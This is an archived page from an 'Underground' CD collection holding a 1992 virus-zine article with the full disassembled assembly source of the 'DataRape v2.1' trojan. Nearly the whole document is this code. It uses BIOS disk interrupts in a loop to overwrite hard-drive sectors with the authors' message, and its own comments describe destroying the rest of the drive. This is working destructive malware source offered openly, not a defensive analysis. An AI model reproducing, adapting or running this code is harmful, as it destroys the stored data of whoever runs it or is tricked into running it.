home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / d / daterape.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  2.9 KB  |  86 lines

  1. ─────────═════════>>> Article From Evolution #2 - YAM '92
  2.  
  3.  
  4.  
  5. Article Title: Data Rape v2.1 Trojan
  6.  
  7. Author: Admiral Bailey
  8.  
  9.  
  10.  
  11.  
  12.  
  13. ;=---
  14.  
  15. ;
  16.  
  17. ; DataRape 2.1 Trojan
  18.  
  19. ;
  20.  
  21. ; Disassembled By Admiral Bailey [YAM '92]
  22.  
  23. ; June 25, 1992
  24.  
  25. ;
  26.  
  27. ; The writers of this virus are Zodiac and Data Disruptor
  28.  
  29. ;
  30.  
  31. ; Notes:Just a regular trojan.  This one puts the messege into the
  32.  
  33. ;       sector it writes.  Even though its not advanced it gets the
  34.  
  35. ;       job done.
  36.  
  37. ;
  38.  
  39. ;=---------
  40.  
  41. seg_a           segment byte public
  42.  
  43.                 assume  cs:seg_a, ds:seg_a
  44.  
  45.                 org     100h
  46.  
  47.  
  48.  
  49. datarap2  proc    far
  50.  
  51. start:
  52.  
  53.                 jmp     begin
  54.  
  55. messege         db      '----------------------------',0Dh,0ah
  56.  
  57.                 db      '         DataRape v2.1      ',0dh,0ah
  58.  
  59.                 db      '    Written by Zodiac and   ',0dh,0ah
  60.  
  61.                 db      '        Data Disruptor      ',0dh,0ah
  62.  
  63. copyright       db      '(c) 1991 RABID International',0dh,0ah
  64.  
  65.                 db      '----------------------------',0dh,0ah
  66.  
  67.  
  68.  
  69. sector          db      1
  70.  
  71. data_3          db      0
  72.  
  73.  
  74.  
  75. begin:
  76.  
  77.                 mov     ah,0Bh                  ; write sectors
  78.  
  79.                 mov     al,45h                  ; sectors to write to
  80.  
  81.                 mov     bx,offset messege       ; writes this messege
  82.  
  83.                 mov     ch,0                    ; clear out these
  84.  
  85.                 mov     cl,0
  86.  
  87.                 mov     dh,0
  88.  
  89.                 mov     dl,80h                  ; drive
  90.  
  91.                 int     13h
  92.  
  93.  
  94.  
  95.                 jnc     write_loop              ; nomatter what jump to
  96.  
  97.                 jc      write_loop              ; the write loop and
  98.  
  99.                 jmp     short write_loop        ; destroy rest of drive
  100.  
  101.                 nop
  102.  
  103. compare:
  104.  
  105.                 mov     sector,1                ; start writing at sec1
  106.  
  107.                 inc     data_3
  108.  
  109.                 jmp     short loc_4
  110.  
  111.                 db      90h
  112.  
  113. write_loop:
  114.  
  115.                 cmp     data_3,28h
  116.  
  117.                 jae     quit
  118.  
  119.                 cmp     sector,9
  120.  
  121.                 ja      compare
  122.  
  123. loc_4:
  124.  
  125.                 mov     ah,3                    ; write sec's from mem
  126.  
  127.                 mov     al,9                    ; #
  128.  
  129.                 mov     bx,offset messege       ; this is in mem
  130.  
  131.                 mov     ch,data_3               ; cylinder
  132.  
  133.                 mov     cl,sector               ; sector
  134.  
  135.                 mov     dh,0                    ; drive head
  136.  
  137.                 mov     dl,2                    ; drive
  138.  
  139.                 int     13h
  140.  
  141.  
  142.  
  143.                 inc     sector                  ; move up a sector
  144.  
  145.                 jmp     short write_loop
  146.  
  147.                 db       73h, 02h, 72h, 00h
  148.  
  149. quit:
  150.  
  151.                 mov     ax,4C00h
  152.  
  153.                 int     21h                     ; now quit
  154.  
  155.  
  156.  
  157. datarap2  endp
  158.  
  159.  
  160.  
  161. seg_a           ends
  162.  
  163.  
  164.  
  165.                 end     start
  166.  
  167.  
  168.  
  169.  
  170.  
  171.